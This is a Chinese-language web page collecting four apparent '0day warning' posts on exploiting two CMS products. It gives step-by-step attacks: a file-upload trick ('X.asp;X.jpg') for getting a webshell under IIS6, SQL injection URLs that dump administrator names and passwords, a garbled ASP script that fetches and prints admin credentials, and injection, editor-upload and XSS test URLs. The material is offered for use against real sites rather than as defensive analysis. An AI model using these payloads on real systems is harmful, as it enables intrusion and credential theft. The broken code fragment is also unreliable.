启航通信企业建站CMS系统v1.1 0day漏洞预警(精选4篇)
篇1:启航通信企业建站CMS系统v1.1 0day漏洞预警
主要是后台编辑器上传漏洞,配合IIS6.0可以直接上传拿shell
以是上利用代码
很熟悉的漏洞了,
篇2:启航通信企业建站CMS系统v1.1 0day漏洞预警
步骤一: 访问/user/userreg.asp 注册用户
步骤二: 访问/KS_editor/selectupfiles.asp ,勾选自动命名选项,上传命名如X.asp;X.jpg文件,
步骤三: 访问上传文件 路径 xm.asp;xm.jpg
篇3:启航通信企业建站CMS系统v1.1 0day漏洞预警
风讯的注册页面...
漏洞页面:/user/SetNextOptions.asp
利用方法:
构造注入
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
“admin_name”管理用户名数据库表
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
“admin_pass_word”管理密码数据库表
把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了
DE>
要暴的ID号(默认是1)<%=id%>”>ID为1的是超级管理员
第”&id&“位的管理员
”response.write “
网站后台地址
”for i=126 to len(str)mid1=mid1&mid(str,i,1)nextresponse.write “
------------------
帐号:”&mid1&“
”x.open “get”,webpass,false x.send str=bin2str(x.responseBody)for i=126 to len(str)mid2=mid2&mid(str,i,1)next response.write “
密码:”&mid2&“
------------------
” response.write “
爆出咯,可以YY了
cmd5” set x=nothingend if%>DE>
具体的利用方法请参考源码,
风讯CMS 0DAY exploits漏洞预警
篇4:启航通信企业建站CMS系统v1.1 0day漏洞预警
测试方法:
1.注入漏洞:
www.site.com/Search/Searc...=0&keyword=1%25=0%20oR%20’%25’=’&type=1
2.FCKeditor上传漏洞
www.site.com/editor/filem...px%2Fconnector.aspx
3.XSS脚本跨站漏洞
www.site.com/prompt/correct.aspx?t=